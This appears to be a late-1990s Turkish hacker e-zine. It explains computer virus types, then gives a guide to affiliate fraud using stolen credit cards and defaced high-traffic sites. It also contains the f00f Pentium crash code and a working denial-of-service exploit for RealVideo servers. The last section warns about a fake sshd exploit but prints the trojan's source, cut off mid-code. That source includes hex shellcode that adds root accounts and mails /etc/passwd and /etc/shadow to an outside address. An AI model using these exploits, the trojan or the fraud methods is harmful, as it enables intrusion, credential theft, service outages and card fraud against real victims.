ANA SAYFA....

1. Virüsler

Virüs nedir ? Trojan (Truva atı) nedir ?

Virüsler, kendi kodlarını başka programlara veya program niteliği olan dosyalara bulaştırabilme özelliği olan (kendi kodunu kopyalayabilen) bilgisayar programlarıdır.Bulaştıkları bilgisayarda genelde hızlı bir şekilde yayılırlar.Belli bir amaca yönelik olarak yazılmış, zarar vermeye yönelik olabilecekleri gibi eğlence amacıyla da yazılmış olabilirler. Truva atları, virüslerden oldukça farklı bir yapıya sahiptir.Asla başka programlara bulaşmazlar.Belli olaylara bağlı olarak tetiklenen bir rutindirler.Kendilerini kopyalayamadıkları için bazı programların içine bilinçli olarak yerleştirilirler.Trojanlar, ilgi çeken, utility gibi programların içine yerleştirilirler.Trojan kodu, trojanın içine gizlendiği programın yazarı tarafından yazılmış olabileceği gibi sonradan da programa eklenmiş olabilir.Trojanlar aslında kopya koruma amacıyla hazırlanırlar. Virüsler çoğunlukla Assembly gibi düşük seviyeli bir programlama dili ile yazılırlar.Bunun asıl 2 sebebi vardır. 1- Assembly'ın çok güçlü bir dil olması:
2- Yazılan programların derlendikten sonraki dosya boylarının çok küçük olması
Bu özelliklerin her ikisi de virüs yazarlarının assembly dilini kullanması için yeterli ve gerekli sebeplerdir. Virüsleri özelliklerine göre sınıflandırmak pek mümkün olmasa da aşağıdaki şekildeki gibi bir sınıflandırma yapmak yanlış olmayacaktır.Ancak pek çok virüs, pek çok özelliği bünyesinde barındırabilir.Bulaşma hızını arttırabilmek amacıyla yapılan bu durum sonucu virüs, boot sektörlere, mbr kayıtlarına, programlara bulaşabilir. Şimdi de bu virüs türlerinin işleyişlerine bakalım 1 - Disk virüsleri : a- Boot b- MBR
2 - Dosya virüsleri : a- Program (TSR ve nonTSR) b- Makro virüsleri
3- FlashBIOS virüsleri
1 - DiSK ViRÜSLERİ Disk virüsleri, adından da anlaşılacağı üzere, disk ve/veya disketler üzerinde işletim sistemi için özel anlamı olan bölgelere (boot sektör, MBR) yerleşen virüslerdir. Disk virüsleri, hakkında en çok yanlış bilginin olduğu virüs türüdür.Boot ve MBR virüsleri, aşağıda da göreceğiniz gibi işletim sisteminden önce hafızaya yüklenir.Bu yüzden işletim sistemini kolaylıkla atlatıp, Yukarıdaki şekilde de görüleceği gibi disk virüslerini boot ve MBR (partition) virüsleri olarak 2 gruba ayırabiliriz. BOOT Virüsleri Boot virüslerinin ne olduğuna geçmeden önce boot sektör nedir, disk üzerinde nerede bulunur, önce bunlara bir bakalım; Boot sektör, bir diskin veya disketin işletim sistemini yüklemeye yarayan 1 sektör (512 byte) uzunluğundaki bir programdır.Boot sektörler, disketlerde 0.cı iz, 0.cı kafa,1.ci sektör üzerinde bulunur. Hard disklerde ise boot sektörü 0.ci iz, 1.ci kafa ve 1.ci sektör üzerinde bulunur.Boot sektör, açılış için gerekli sistem dosyalarının yükleyen programdır.Aynı zamanda disk (veya disket) ile ilgili bilgileri saklar.DOS buradaki bilgileri kullanarak cylider hesaplarını yapar. Nornal koşullarda, bilgisayarı başlatabilecek durumdaki bir sistem disketini (virüssüz) sürücüye takıp bilgisayarı açtığımızda, bilgisayar ilk olarak disket sürücüye bakar.Eğer sürücüde bir disket var ise bu disketin boot sektörü hafızanın 0000:7C00 (hex) adresine okunur ve okunan boot sektör çalıştırılır.Boot sektör, işletim sistemini yükleyerek denetimi işletim sistemine bırakır.Eğer bilgisayarı boot edecek disket bir boot virüsü içeriyorsa o zaman durum değişir.Bilgisayar, boot sektörü yine 0000:7C00 adresine okur ve akışı bu adrese yönlendirir.Disketten okunan boot kaydı, yapı olarak değiştiğinden dolayı, 0000:7C00'daki kod virüsü hafıza içine yükleyip, hafızadaki konumunu garanti altına alacaktır.Virüs aktivitesi için gerekli interrupt servislerini de kontrol altına aldıktan sonra orjinal boot kayıdını okuyarak işletim sisteminin yüklenmesini sağlayacaktır. MBR (Partition) Virüsleri MBR virüsleri esas olarak, boot virüslerinden pek de farklı değildir.Ancak can alıcı bir nokta vardır ki, bu boot ve mbr virüsleri arasındaki en önemli noktadır. Hard diskler kapasite olarak çok farklı ve büyük kapasitede olduklarından diskin DOS'a tanıtılması amacıyla MBR - Master Boot Record (Ana açılış kaydı) denilen özel bir açılış programı içerirler.Bu kod diskin 0.cı iz, 0.cı kafa ve 1.ci sektörü üzerinde bulunur.Yani disketlerde boot sektörün bulunduğu konum, hard diskler için MBR yeridir.Master boot record, hangi disk partitionundan bilgisayarın açılacağını gösterir.Bu yüzden çok önemlidir.Eğer bilgisayar hard diskten boot ediliyorsa, o takdirde mbr ve partition table okunur.Aktif partitiona ait boot sektör okunur.Bundan sonrası boot sektör kısmındaki sistemin aynısıdır. 2 - DOSYA ViRÜSLERi Dosya virüsleri açıkça anlaşılacağı gibi hedefi dosyalar olan virüslerdir.Dosya virüsleri çoğunlukla COM, EXE, SYS olmak üzere OVL, OVR, DOC, XLS, DXF gibi değişik tipte kütüklere bulaşabilirler. Makro virüsleri Makro virüsleri Word, Excel gibi programların makro dilleri ile (mesela VBA - Visual Basic for Applications) yazılırlar.Aktif olmaları bazı uygulamalara (word, excel vs) bağlı olduğundan program virüslerine oranla çok daha az etkilidirler. Program virüsleri
(Not :
Program virüsleri ile ilgili açıklamalar ileride detaylı olarak anlatılacaktır).
Program virüsleri, DOS'un çalıştırılabilir dosya uzantıları olan COM ve EXE türü programlar başta olmak üzere SYS, OVL, DLL gibi değişik sürücü ve kütüphane dosyalarını kendilerine kurban olarak seçip bu dosyalara bulaşabilirler.Dosya virüsleri bellekte sürekli kalmayan (nonTSR) ve bellekte yerleşik duran (TSR) olarak 2 tipte yazılırlar. nonTSR (Bellekte sürekli kalmayan) virüsler Bellekte sürekli olarak kalmazlar.Kodları oldukça basittir.Bellekte sürekli kalmayan virüsler sadece virüslü bir program çalıştırıldığında başka programlara bulaşabilirler.Virüslü program çalıştırıldığında programın başında program kontrolünü virüs koduna yönlendirecek bir takım komutlar bulunur.Virüs kontrolü bu şekilde ele aldıktan sonra virüs kendisine temiz olarak nitelendirilen virüssüz programlar aramaya koyulur.Bulduğu temiz programların sonuna kendi kodunu ekler ve programın başına da virüsün kontrolü ele alabilmesi için özel bir atlama komutu yerleştirir ve kendisine yeni kurban programlar arar.Virüs bulaşma işini bitirdikten sonra çalıştırmak istediğimiz program ile ilgili tüm ayarları düzenleyerek kontrolü konak programa devreder. TSR (Bellekte sürekli kalan) virüsler TSR virüsler yapı olarak TSR olmayan virüslerden çok farklıdır.TSR virüsler, 2 temel bölümden oluşurlar.1.ci bölüm; Virüsün çalışması için gerekli ayarlamaları yapar ve TSR olacak kodu aktifleştirir.2.bölüm TSR olan kodun kendisidir ve TSR virüslerin hayati önemdeki bölümüdür.Bu tip virüsler, çalışmak için sadece TSR olmakla kalmazlar.Aynı zamanda çeşitli Interruptları (kesilmeleri) kontrol altına alırlar.Böylece DOS üzerinden yapılan işlemleri bile kontrol altına alabilirler.Örnek vermek gerekirse; TSR bir virüs DIR, COPY gibi DOS komutları ile yapılan -daha doğrusu yapılmak istenen- işlemleri kontrol altına alabilir.Kullanıcı DIR komutunu kullandığında dosya boylarının 0 olarak gösterilmesi, dosya boylarının eksik gösterilmesi gibi işlemler TSR bir virüs için çok kolaydır. 3 - FlashBIOS Virüsleri FlashBIOS virüsleri tekrar yazılabilir özellikteki BIOS chiplerine bulaşırlar.

ViRÜSLER NELERi YAPABiLiR, NELERi YAPAMAZ ?

Virüslerin neleri yapıp neleri yapamayacakları konusu en çok ilgi çeken, üzerinde en çok konuşulan konulardan birisidir. Çünkü bir virüs, yaptıklarıyla anılır ve bilinir.Virüserin en çok korkulan etkilerin başında gelenler şunlardır:

BİR VİRÜS BİLGİSAYARDAN SİLİNDİKTEN SONRA KENDİ KENDİNE TEKRAR ORTAYA ÇIKIP ETKİNLEŞEBİLİR Mİ ? Hayır.Bir virüsün temizlenmesinden sonra durduk yerde yeniden peydahlanması doğru değildir.Eğer bir antivirüs programı ile sisteminizden virüsü temizlemenize rağmen virüs tekrar ortaya çıkıyorsa 2.durum sözkonusu olabilir. 1- Antivirüs, virüsü temizleyemiyor olabilir.Amatör programcıların yazdıkları shareware olarak dağıtılan antivirüs programlarından birini kullanıyorsanız bu durumla karşılaşmanız olasıdır.Bunun pek çok sebebi olabilir.Örneğin antivirüs, virüsü başka bir virüsle karıştırıyor olabilir.İmza tarama esasına göre çalışan antivirüslerde ortaya çıkabilecek bu sorun genellikle iki virüsün birbirinin varyantı (üzerinde küçük değişiklikler yapılmış biçim) olmasından kaynaklanır.Bir veya birkaç virüsü temizlemek için hazırlanmış eski antivirüs programlarının o virüsün yeni bir varyantının temizlenmesi amacı ile kullanılması sonucu da ortaya çıkabilir.Mesela; elimizde bir programcının 4 yıl önce yazdığı xx virüsünün antivirüs programı olsun.1 yıl önce ortaya çıkan xx virüsünün bir varyantı olan xx.a gibi bir virüsü temizlemek istersek muhtemelen tarama imzaları aynı veya benzer yapıda olacağından bu tür bir sorun ile karşılaşabiliriz.Bunun sonucu olarak virüs uzunluğunun farklı oluşundan dolayı yanlış isimle bile olsa tespit edilir ancak temizlenemez.Bu durumda antivirüs kullanıcıyı yeni bir virüsle karşılaştığını belirten bir mesaj ile uyarır. 2- Bir yerlerde temizlemeyi unuttuğunuz birkaç virüslü dosyanız kalmıştır.Virüs taramalarında taramayı unuttuğunuz disketleri kullanırsanız ve disketteki programlar virüslü ise siz farkına varmadan virüs tekrar sisteminize bulaşacaktır.Virüs taraması yaparken sahip olduğunuz tüm disk ve disketleri virüs taramasından geçirin.Ancak bu şekilde virüslerden kurtulabilirsiniz. Burada belirtmek isterim ki, bu iki durumdan 2.sinin olması daha muhtemeldir.Birinci durumun gerçekleşme ihtimali çok azdır. VİRÜSLER VERİ DOSYALARINA ZARAR VEREBİLİR Mİ ? Evet, kesinlikle verebilir.Özel bir veya birkaç dosya türünü hedef alan virüsler, bu tür dosyalara silebilir veya içlerindeki veriyi değiştirebilir, dosyanın yapısını bozabilir.Örneğin yerli virüslerden Trakia.653 virüsü AutoCAD'in DXF ve DWG uzantılı dosyaları hedef almakta ve bu kütüklerin yapısını bozarak işlenemeyecek hale getirmektedir.Trakia.560 virüsü bazı dosyaları silmektedir.Ancak bu tür etkiler virüsün farkedilmesi kolaylaştıracağından pek tercih edilmezler. ViRÜSLER YAZMA-KORUMALI DiSKETLERE BULAŞABiLiR Mi ? Disketlerin yazma koruması yazılımla kontrol edilen bir sistemdir ve bu sistem aşılabilir.Ancak yazma korumasını kapatmak virüs içinde ekstra kod anlamına gelir.Eksta kod, virüsün boyunu uzatacak ve virüsün farkedilmesini kolaylaştıracaktır.Bu yüzden uygulanan bir yol değildir.Virüsler, yazma korumasını kapatmak yerine yazma korumasını kontrol edip koruma varsa bulaşmamayı tercih ederler. VİRÜSLER CMOS'A BULAŞABİLİR Mİ ? Herhangi bir virüsün CMOS alanına bulaşması mümkün değildir.Hatta imkansızdır.CMOS bellek kapasitesi üretici firmaya bağlı olarak 128 veya 256 bayttır.Bu alan virüsün ihtiyaç duyacağı belleğin çok altındadır.Kaldı ki CMOS, setup parametrelerinin saklandığı bir veri alanıdır.Ancak virüsler setup parametlerini değiştirebilirler. VİRÜSLER DONANIMA ZARAR VEREBİLİR Mİ ? Eskiden kısmen, günümüzde hayır.Eski MDA (mochrome display adapter - tekrenkli görüntü bağdaştırıcısı) ekran kartlarına bir komut serisi yollanarak MDA kartlar yakılabilir.Ancak MDA kartlar çoktan tarih olduğundan artık bunun pek önemi de yok. Eski disklerin okuma/yazma kafalarının ani hareketlerle hareket ettirilmesi sonucu diskin bozulmasını sağlamak mümkündü. Artık günümüzde ise disklerin cacheleri sayesinde bu tür hareketler disk tarafından engellenebiliyor ve disklerdeki kafalar manyetik bir esasa göre çalışıyor.Bu sayede elektrikler kesilse bile disk zarar görmeden kafalar park ediliyor. Bir de disk üzerinde bir bölgenin milyonlarca kez formatlanması durumu var.Bu işlem sonunda disk üzerindeki manyetik malzeme zarar görecek, disk okunamaz duruma gelecektir.Bu işlemin partition table üzerinde yapıldığını düşünürsek diski kaldırıp çöpe atmaktan veya disk kasasını açıp raf süsü olarak kullanmak dışında geriye pek bir şey kalmaz.Ancak hemen belirteyim ki bu formatlama işlemi oldukça uzun sürecektir.Bir virüsü diski milyonlarca kez formatlamak isterse, kullanıcı bilgisayarın kilitlendiğini düşünecek ve resetleyecektir.Sonuçta virüs amacına ulaşamamış olacaktır. Eğer Windows95/98/NT gibi bir işletim sisteminin çalıştığı bilgisayarlarda windows direkt disk erişimlerini mümkün olduğunca engellemeye çalışır. VİRÜSLER V-SAFE, VIRSCAN, GUARD GİBİ KORUMA PROGRAMLARINI ATLATABİLİR Mİ ? Yeni bir virüs veya çok iyi yazılmış bir virüs bu tür programları safdışı edebilir.Ancak koruma programları virüslü programı daha çalışmadan önce test ettiklerinden bu düşük bir ihtimaldir.Virüsler, bu tür programları aktivitelerinin rapor edilmesinin engellemek için atlatmak ister. Bu yazı gelecek ay devam edecek...


2. Hacker'lar Nasıl Milyoner Olur?

Burada bazi gecen yontemleri her hacker uygulayamaz fakat bazi yontemleri uygulamak icin hacker olmaniz bile gerekmez...

ONEMLI NOT : Bu yontemler 1998 Kasiminda sorunsuz calisiyordu yalniz yakalanma riski her $eyde oldugu gibi bunda da var...
LAMER NOT : Bunlari yazmakla ne lamer oluyorum ne de hacker amacim bilginin paylasimi!!! tabiii bazi salaklar burda yazan yontemleri uglulamaktan aciz!!!
HACKER NOT : Hehehe her hackerin biraz finansal sorunlari vardir bu yontemlerle bunlari cok iyi halledebilirsiniz >:))))))

Yontemleri uygulamak icin gerekli araclar:

(1). Guzel bir e-mail adresi :) hotmail bunun icin cok uygun.... Ayrintili bilgi icin bakiniz guzel bir e-mail adresi...
NOT : bu e-mail adresi olmazsa olmaz her $eyde lazim bir $ey... Ekodinamik bir olayyyyyyyy....
(2). Ho$h bir web sayfasi... Bu her yontem icin gerekli olmasada bir cok $ey icin gerekli bunun icinde www.8m.com , www.xoom.com cok ho$h olur... yine ayrintili bilgi icin bakiniz ho$h bir web sayfasi...
(3). Home Peyc yapici... Burada guzel bir html editoru gerekiyor size viediti veya notepad i tavsiye ederim... ama siz illa ben lamerim diyorsaniz Front Page de kullanabilirsiniz...
(4). CUTEFTP :) internet sayfanizi server a gondermek icin en gerekli program veya shell de ftp yazmanizda yeterli...
(5). NETSCAPE : bu da olay mi ?
$imdilik gereklilikler bu kadar...

1). Guzel bir e-mail adresi... Ben size e-mail adresi alinacak yer olarak hotmail i tavsiye ediyom... hemen iki dakika da hesabinizi aciyorlar... $imdi diyeceksiniz ki bu e-mail adresi ne ise yariycak ????
Sanane...
Hesap actirdiginiz yerler size sifrelerinizi ve hesap bilgilerinizi bu adrese gondercek...
LAME BIR SORU : benim zaten bir e-mail adresim var... buna ne gerek var...
CEVAP : $imdi hotmaile gidin... www.hotmail.com burda sing up mi neyse ona girin ve her seyin mantikli oldugu bir hesap actirin...

First Name : Kibar
Last Name : Feyzo
Login : kibariye vs...
bunlar elin gevuruna anlamli gelir... Sakin gidip de
Firt Name :asdasdad
Last Name :asdadasd
Login : atd3169
gibi $eyler yapmayin hesabinizin omrunu azaltirsiniz...
Herneyse butun bunlari yaptiginizi ve key0s@hotmail.com gibi bir hesabiniz oldugunuzu var sayiyorum... Eger hotmail den hesap actiramadiysaniz faq@ebmesi.org den bana e-mail atinda size yardimci olayim!!!
(2). Ho$h bir web sayfasi : Bu da cogu yerde isimize yariycak...
SORU : nerde ?
CEVAP : ilerde...

iste gidin www.xoom.com veya www.8m.com dan bir hesap actirin butur yerler sizlere 10-20MB gibi bi yer vercektir... i$te... boylece members.xoom.com/salaksalak veya salaki.8m.com gibi bir adresiniz oldu Siz gerekli formdaki her yeri mantikli sallamaca seklinde doldurunuz... e-mail adresi olarakda hotmail den actiginiz e-mail adresini girin... onlar sifreyi ve gerekli bilgileri size ula$tircaktir...

SORU : ben beceremedim ne yapcam ?
CEVAP : ALT+F4
SORU : ALT+F4 ise yaramadi, ne olcak ?
CEVAP : CTRL+ALT+BACKSPACE

(3). home peyc yapici (html editoru) evet bazi java scriptleri yazmak ve internet sayfanizi hazirlamak icin buna ihtiyac var... Eger html dilini biliyorsaniz vi veya notepad kullanin... yoksa front page kullanin...

SORU : Bu editorleri nerden bulcam ve nasil calistircam ?
CEVAP :viedit icin $vi
notepad icin C:\>WINDOWS\NOTEPAD.EXE
FrontPage icin www.t50.com

Evet gelelim milyoner olma olayina bakalim neler yapcaz :)))) Burdaki olaylari adim adim anlatcam....

[1]. PENCERE AC CLICK AL OLAYI!
Bu olay icin once www.cyberthrill.com , www.valueclick.com , www.pennyweb.com veya porno bir siteye giderek webmasters $$$ olayina girin ve kendinize bir sponsor alin...!!!

Burda sponsor alirken dikkat edilmesi gerekenler :
1. Cekler adiniza gelcek ve sizden ba$kasi bunlari paraya ceviremiycek ondan isim soran yerlere gercek isminizi yazin veya cekleri bozdurabilicek bir tanidiginizin!

2. Adres soruyorlar... bu adreslere posta ile cekleri gonderiyor ondan adresler de dogru yazin mumkunde adres olarak size ait olmayan ama gelen ceklerin size ulasabilcegi bir posta kutusu adresi verin... (NE MUTLU GIZLILIK OLAYI >:) )

3. e-mail adresi olarakda tabeeee hotmail den aldigin adresi ver...

$imdi eger sponsorunuz e-mail adresinize banner ve link ile ilgili bilgileri ve sifrenizi gondericek...
Evet ben sponsor olarak sizlere cyberthrill diyom... cunku sayfanin icerigine bakmadan her sayfaya sponsorluk veriyor bu arada belirteyim ki benim 800$ kaldi... Ilk seferler cekleri gonderdiler ama sonradan gondermemeye basladilar...

$imdi e-mail adresinize bilgiler geldikden sonra guzel bir sayfa hazirlayin kendinize!!!Milletin ilgisini cekicek bir seyler koyun!!!

SORU : Ne gibi ilgi ceken $eyler ???
CEVAP : Aha bunlar

1. ADULT en ba$ta gidin adult siteleri hack edip kendinize accound acin.. (sahte kredi karti rulaz) ondan sonra bu sifreleri sayfanizda yayinlayin...
2. MP3 yeni cikan veya gulze mp3lerden bir sayfa olu$turun...
3. HACK : burada ise lamerler icin dokumanlar vs olan bir sayfa hazirlayin... biraz exploit, port scanner, nuke, DOS vs. programlar koyun...
4. WAREZ : yeni cikan programlara link koyun... Evet sayfayi hazirladikdan sonra index.html e a$agidaki satiri ekleyin... burda www.cyberthril.com.... gibi olana link site gelenle degistirin...

<script LANGUAGE="javascript">
<!--
window.open(
"http://www.cyberthrill.com/cgi-bin/sponsor/mla/ricochet.cgi?-07y2",
"ct00000", "width=600,height=40");
//-->
</script>

buradaki olay.. adam sayfaniza gelince baska bir pencere aciliyor ve sponsorunuz sayfasina gidiyor... iste buda size para kazandiriyor...

NOT HEMIDE ONEMLI : eger pennyweb de bunu yaparsaniz bi ise yaramaz...
NOT ELITE : olm bazi serverlar bu olayi anliyor ve uyeliginizi kesmiyor ama size parada gondermiyor...
Tamam mi site ver hersey hazirsa sira sitenin reklamina geldi... gidin irc.raksnet.com.tr de #zurna veya bir suru adamin oldugu kanal ve script e kanala giren herkese otomatik mesaj atma olayini ayarlayin... bu mesajda sitenizin adresi ve icerigi olsun... i$teeee birin olay bitdi... bu olaydaki kazancaginiz para sizin sitenizi hit ine bagli... yaniiii sitenize ne kadarc cok adam gelirse o kadar cok para kazanirsiniz... Bu arada bu yol en az para kazanilan yollardandi...

- True Story -
Evet yukarda bahsetdigimiz sponsorluk olayini ben gerceklestirdim ve cok guzel ise yaradi... Once gitdim artemis.efes.net.tr den bi bele$h sayfa aldim ve cyberthrill den kendime bir hesap actirdim... Ardindan ozamanlar win 98 yeni cikmi$ti ve kimsede bulunamiyordu... bende gidip bi unv. yi hack etdim... login win98 pass win98 diye bir user actim ve 2 gecede win 98 i buraya
upload etdim... Ondan sonra bir home peyc hazirladim... her gelende otomatik pencere aciyordu birincisi sponsor ikincisi win 98 di... Sonra bu sayfayi efes.net.tr e gonderdikden sonra #warez4free #warez #zeraw gibi warez kanallarinda reklamini yaptim... sayfa 1 hafta acik kaldi sonra kapandi!!! olaydan bir ay sonra evet 280$ lik bir cek geldi :)))

[2]. BaBalara Gore i$...
Evet bu yontemi herkes uygulayamaz... Birazcik buzuk istiyo biliyon mu!!! $imcik oncelikle yine digin bir yerden sponsor alin...Ok aldiniz mi ? Tamam sorun simdi hangi sayfaya yerlestirceginiz!!! Gecen sene OSS sonuclari oss.osym.gov.tr da aciklandi ve sayfa baya bi hit aldi!!! Gunde 400.000 den fazla... bunu 20 cent ile hesaplarsak baya bi bara ediyor...
peki bunu nasil yapcaz... bunun icin iyi bir hacker olmak gerekiyor... ilk olarak hit i yuksel olan bir site secin ve bu siteyi hack edin... sonra index html in degistirin ve frame olayina girin... sayfanin en altina kullanicinin goremiyecegi kucuklukte bir frame yaratin ve buna otomatik link koyun... sponsorunuzun adresine... evet... adminler sizi yakalayana kadar para basarsiniz... Bu olay baya bi zor ve yakalanma riski yuksek... biz bunu oss sonuclarinda denedik ama ba$aramadik... siz $ansiniz varsa deneyin... eger basarirsaniz bana key0s@hotmail.com a bir e-mail sallayin!!!

[3]. En cool way...
Araci olmak!!! Bu olay diger sponsorluk olaylarindan daha farkli ve kazancaginiz parada daha cok Bir de bu olayda elalemin eline bakmiyorsunuz... Yani millet gelsinde click atsin olayi yok! Simdi yine gidin kendinize bir home peyc alin sonra bu home peyce Delphi, Visual Basic vs programlama ile ilgili bir kac link, bilgi ve source code filan koyun... Ondan sonra www.amazon.com a gidin ve kendinize bir hesap actirin... Burdaki olay click degil... sayfaniz userinden amazon.com a baglanip ve kitap alanlarin odedigi baranin %2 si gibi bir ucret size geliyor... Amazon.com dan hesabi actirdiktan sonra size gondercekleri html satrilarini sayfanize ekleyin... ve sayfayi update edin!!!Sonra elinizde olan kredi karti numaralarini bir kagida yazin... Ve internet cafe veya okulunuzun bilgisayarlarinin basina gecin... Actiginiz sayfaya gidin ve burdan amazon.com gecin... simdi programlama kitaplari secenegini secin ve kitap almaya baslayin... fazla abartmayin 5 kitap yeterli... (not pahali kitaplari alin) ondan sonra mantikli sallame bilgiler ile formu doldurup kredi karti numarasini yazip kitaplari alin... Hep farkli kredi karti numaralari ve farkli sallama mantikli bilgiler ile bunu tekrarlayin... 2000$ lik filan alis veri$ yapin... Onlar size sayfaniz uzerinden yapilan ali$ veris miktari ile ilgili bilgiyi e-mail adresinize gonderiyorlar... Ardindan da cekleri :)))) Bunu denedim... 40$ lik ve 180$ lik iki cek geldi :) Burdaki olay... sadece kitap degil... bunun gibi komisyon veren... domain satan yerler, oyuncakcilar , muzik cd kaset satan yerler bir suru yer var.....
Evet $imdilik benden bu kadar... Yaniiii ne diyim... birazda olsa yolumuzu bulduk... Bakalim daha ne kek yontemler cikicak...

Bo dokuman kEY0S tarafindan hazirlanmi$tir...
all rights reserve edilmi$tir...


3. Intel "f00f" Pentium Bug

Açıklama : Bu bug tanımlanamayan bir yöntem ile Intel Pentium CPU ları çökertir.

Yapan : Bu bug ı bulan kişi bilinmiyor. Bug anonymous remailer ile dağıtılmıştır.

Sistem : Bug Intel Pentium CPU kullanan bütün sistemlerde çalışır. DOS, Windows Linux, SCO, Solaris...

Bu hata bütün Pentium işlemciler için çok ciddi bir tehlike unsurudur. Aşağıdaki kod pentium işlemci ile çalışan bir çok makinayı çökertebilir. Makinanın MMX olup olmaması, cpu hızı  ve kullanılan işletim sistemi önemli değil! Bu bug bazen makinayi resetlerken bazen de donduruyor.

char x [5] = { 0xf0, 0x0f, 0xc7, 0xc8 };
main ()
{
void (*f)() = x;
f();
}


4. D.O.S Attack (Real Player Server'lar İçin)

DOS against realvideoserver by Progressive Networks

Açıklama : Bu da bir başka DOS(denial of service) atak yöntemi.
Sistem : Linux ve NT üzerinde çalışan Real Video Serverı.
Hazırlayan : Rootshell

Bu hata pnserver hatası gibi gözüksede, daha farklı çalışıyor. Telnet client den serveri çökerten 6 karakter göndererek tamponu dolduruyor. Çalışan exploit aşağıda :

/*
* pnserver exploit [1/15/98]
*
* Crash's Progressive Networks Real Video Server [
http://www.real.com/ ]
*
* [
http://www.rootshell.com/ ]
*
* Compiled under linux.
*
*/
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
void main(int argc, char *argv[])
{
struct sockaddr_in sin;
struct hostent *hp;
char *buffer;
int sock;
if (argc != 3) {
printf("usage: %s <rvserver_host> <port>\n\nNote: Try port 7070.\n\n", argv[0]);
exit(1);
}
hp = gethostbyname(argv[1]);
if (hp==NULL) {
printf("Unknown host: %s\n",argv[1]);
exit(1);
}
bzero((char*) &sin, sizeof(sin));
bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
sin.sin_family = hp->h_addrtype;
sin.sin_port = htons(atoi(argv[2]));
sock = socket(AF_INET, SOCK_STREAM, 0);
connect(sock,(struct sockaddr *) &sin, sizeof(sin));
sprintf(buffer, "%c%c%c%c%c", 255, 244, 255, 253, 6);
write(sock, &buffer[0], strlen(buffer));
close(sock);
}


5. Uyarılar

1. Bir kaç gün önce bir adam bazı mailing listlere,mIRC(5.41) de ki bugdan bahseden bir mail atmıştı.Söylediğine göre bu scripti çalıştıran kişi,mIRC kullanan kişinin ctcp sinde bulunan açık sayesinde op oluyordu.
ChanOp hacklemek gerçekten eğlenceli bir şey.Bunun yüzünden dünya üzerindeki bir çok kelek (bende dahil) bu adamın dediklerine inanıp scripti çalıştırdık.Allahtan benim kullandığım mIRC nin versiyonu 5.11 diki scriptte yer alan yeni komutları clientım algı
layamadı.
Bu adamın bahsettiği script bir çeşit "trojan"dı! Ben hiç kontrol etmeden hemen load ettim.Ve çalışmayınca da sildim.Fakat birkaç gün sonra,bugtraq de bu scriptin bir trojan oldupu açıklandı.
Nasıl bir trojan mı?Şöyle..Script çalıştırıldığında,o
tomatik olarak bir webserver a bağlanıyor, ve bir backdoor dosyası çekip bunu sizin makinenizde çalıştırıyor.Ve sizde aval aval kanalda op olmanızı bekliyorsunuz.
Yani öyle bir şey duyarsanız kesinlikle almayın,çalıştırmayın derim.

2. İkinci uyarım ise,şu son günlerde bayağı tartışılan bir konu üzerine...

Biliyorsunuz rootshell yaklaşık 10-15 gün önce hacklendi.Hala nasıl hacklendiği tartışılıyor. Gerçi yapılan analizlerde bug ın ssh(Security shell)de olduğu açıklandı.Fakat yine de ssh nin yaratıcısı Tatu Ylonen,avaz avaz bug yok,diye bağırıyor. Yine geçenlerde bir kelek bir çok mailing liste "sshnin exploiti" başlıklı bir c yolladı. Bu dosyanın ismi "sshdwarezc yada sshdexp.c".Bu iki dosyayı görürseniz falan sakın alayım, çalıştırayım demeyin.
Aslında kont
rol edilirse görülür,çok basit ve aptal bir program.Yaptığı şey şu,"/etc/passwd" dosyasına iki tane yeni account ekliyor ve scripti kodlayan lamer'a mail atıyor. İşte kod bu,

echo b4b0::0:0::/:>>/etc/passwd;echo babo::10:10::/: >> /etc/passwd ; (cat /etc/passwd
/etc/shadow ;/sbin/ifconfig)|mail kitandjp@hotmail.com /bin/sh

Eğer bu programı sisteminizde çalıştırdıysanız."/etc/passwd" e yeni bir şeyin eklenip eklenmediğini aşşağıdaki komutlar ile görebilirsiniz.

grep babo: /etc/passwd
grep b4b0: /etc/passwd

İlgilenen arkadaşlar için aşşağıya kodu koyuyorum:

-- sshdwarez.c --
/************************************************************************/
/* root exploit for Linux 2.0.* and possible 2.1.* SSHD 1.5-1.2.23 */
/* On some weird systems this causes a segfault */
/* If it doesnt work change the offset (usually between 0 and 5000) */
/* (try increments of 2.......) */
/* TO RUN: */
/* (./sshdwarez ; cat) | nc victim 22 */
/* */
/* forever yours: st4n@zdnetmail.com */
/************************************************************************/
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#define OFFSET 146
#define NOP 0x90
char shellcode[] =
"\xbc\x84\x04\x08\x65\x63\x68\x6f\x20\x62\x34\x62\x30\x3a\x3a\x30\x3a"
"\x30\x3a\x3a\x2f\x3a\x3e\x3e\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77"
"\x64\x3b\x65\x63\x68\x6f\x20\x62\x61\x62\x6f\x3a\x3a\x31\x30\x3a\x31"
"\x30\x3a\x3a\x2f\x3a\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73"
"\x73\x77\x64\x20\x3b\x20\x28\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
"\x61\x73\x73\x77\x64\x20\x2f\x65\x74\x63\x2f\x73\x68\x61\x64\x6f\x77"
"\x20\x3b\x2f\x73\x62\x69\x6e\x2f\x69\x66\x63\x6f\x6e\x66\x69\x67\x29"
"\x7c\x6d\x61\x69\x6c\x20\x6b\x69\x74\x61\x6e\x64\x6a\x70\x40\x68\x6f"
"\x74\x6d\x61\x69\x6c\x2e\x63\x6f\x6d\x00\xeb\x1f\x5e\x89\x76\x08\x31"
"\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
int fetch(int *w){ /* push and return something from the stack */
char stack[4096];
int (*push)();
memcpy((int*)&push,w,sizeof(int));
memcpy(stack,(char*)w+4,OFFSET-5);
push(stack);
return *w;
}
int i;
char *p;
main(int argc,char**argv)
{
char s[1024];
char ssh[] = "\x8c\xfd\xff\xbf\x48\x9b"; /* starts ssh session */
strcpy(argv[0],"vi ");
if (getuid())
{
system("/bin/echo this program uses priveledged ports. "
"run as root.");
return -1;
}
write(1,ssh,sizeof(ssh));
for (i=0;i<500;i++)
s[i]=NOP;
p=&s[i];
memcpy(p,&shellcode[OFFSET],sizeof(shellcode)-OFFSET);
